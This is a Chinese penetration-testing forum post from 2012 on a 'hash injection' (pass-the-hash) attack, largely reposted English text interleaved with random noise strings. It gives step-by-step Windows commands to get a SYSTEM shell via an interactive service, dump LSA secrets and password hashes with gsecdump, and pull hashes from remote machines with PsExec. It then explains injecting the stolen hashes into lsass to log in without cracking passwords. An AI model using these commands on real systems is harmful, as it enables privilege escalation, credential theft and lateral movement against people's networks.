中国网络渗透测试联盟
标题:
HASH注入式攻击
[打印本页]
作者:
admin
时间:
2012-11-6 21:09
标题:
HASH注入式攻击
o get a DOS Prompt as NT system:
0 }% w: E7 a: I+ m; R
/ d) A3 D0 k Y- q
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
) w5 O( d) W) ]3 y8 s
[SC] CreateService SUCCESS
2 _, r3 f6 W/ I9 W% |
1 L. g5 C P& A* G$ e9 ^+ o
C:\>sc start shellcmdline
/ N$ `) }- T5 F0 D& }
[SC] StartService FAILED 1053:
- O6 C6 Y4 [. g1 K* N
& B" C5 h5 P; |
The service did not respond to the start or control request in a timely fashion.
3 P5 |( H9 h7 O; ~; e/ E/ _7 V/ D
; Y$ t, H4 ~9 s/ _
C:\>sc delete shellcmdline
5 u! N. p, N5 F x o; P r+ J1 k8 b3 f
[SC] DeleteService SUCCESS
1 X4 F5 F$ n& z/ D% K& Y0 j; i- @1 h
4 V8 r4 k+ |3 ^" F
------------
; C9 l, Y% Q, d
6 P/ C+ \, a+ Y) H
Then in the new DOS window:
; x y4 o% O& k$ _: {
8 |$ @& J5 {( _: n% u" Y
Microsoft Windows XP [Version 5.1.2600]
. Z8 s: {( L8 p7 Q
(C) Copyright 1985-2001 Microsoft Corp.
# a- ` \. r7 u- \3 e5 n; j
$ u0 Z* n. y+ x( i6 f+ @0 m
C:\WINDOWS\system32>whoami
/ w: v6 T7 q# T. u9 x5 ?- n8 u5 W
NT AUTHORITY\SYSTEM
6 d) m; R) Y5 Z# Z" ?4 z3 K
( ^" \5 Q5 H) d% i% W& ?. ^* g' y
C:\WINDOWS\system32>gsecdump -h
% e/ {( e' B0 m- o B/ \. F9 K
gsecdump v0.6 by Johannes Gumbel (
链接标记
johannes.gumbel@truesec.se
)
6 t0 g( l. U, R- P* q6 p" j
usage: gsecdump [options]
% x" ? f g' e6 u& Z
D+ C6 i0 F6 M4 @9 H8 O
options:
$ {8 w" n" }7 r, E/ [& \- r0 `
-h [ --help ] show help
& F% U. x+ u5 t; y! r) T" B L+ P
-a [ --dump_all ] dump all secrets
" n# V1 W6 S8 Y- a/ j
-l [ --dump_lsa ] dump lsa secrets
s1 y" ]' S7 s# `$ G9 o' m
-w [ --dump_wireless ] dump microsoft wireless connections
5 a. o4 [! n8 X' G9 F# ?0 x
-u [ --dump_usedhashes ] dump hashes from active logon sessions
' G( T6 T) N0 ]! F& L" N6 \
-s [ --dump_hashes ] dump hashes from SAM/AD
' ~, g. e& y. O ?& q& d. r
! R4 s" y7 U- r" \7 p1 T1 Y
Although I like to use:
3 o+ ^, U4 e. f7 @
& E8 `9 W6 h$ Q
PsExec v1.83 - Execute processes remotely
# C0 c: D w8 _; ?
Copyright (C) 2001-2007 Mark Russinovich
) `% V+ g1 s2 r8 L' ~* e! H' j
Sysinternals -
链接标记[url]www.sysinternals.com
[/url]
2 G! Z/ h9 W5 z2 p' X. T
# C# S% a: n3 ]+ W0 T5 \5 N" p
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
, A4 }4 C, `# X
2 `" D% D' s" b
to get the hashes from active logon sessions of a remote system.
# K* v! a8 a j2 C6 J6 f8 o: R3 S
) p* _: q) v8 P s+ q( ]
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
, l: E, V; r: U+ ^
# K- o0 _# ]) c* \! F* R7 X9 _" W
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
) _( x2 ]/ N- h3 q7 a; c
原文出处:
链接标记[url]http://truesecurity.se/blogs/mur
... -text-password.aspx[/url]
: u) ]6 P' D; i' s* d
, Q) I. b4 y$ i8 e$ o2 [" f7 _
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
2 G5 c4 C0 Y& g) Y! _3 x; q
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2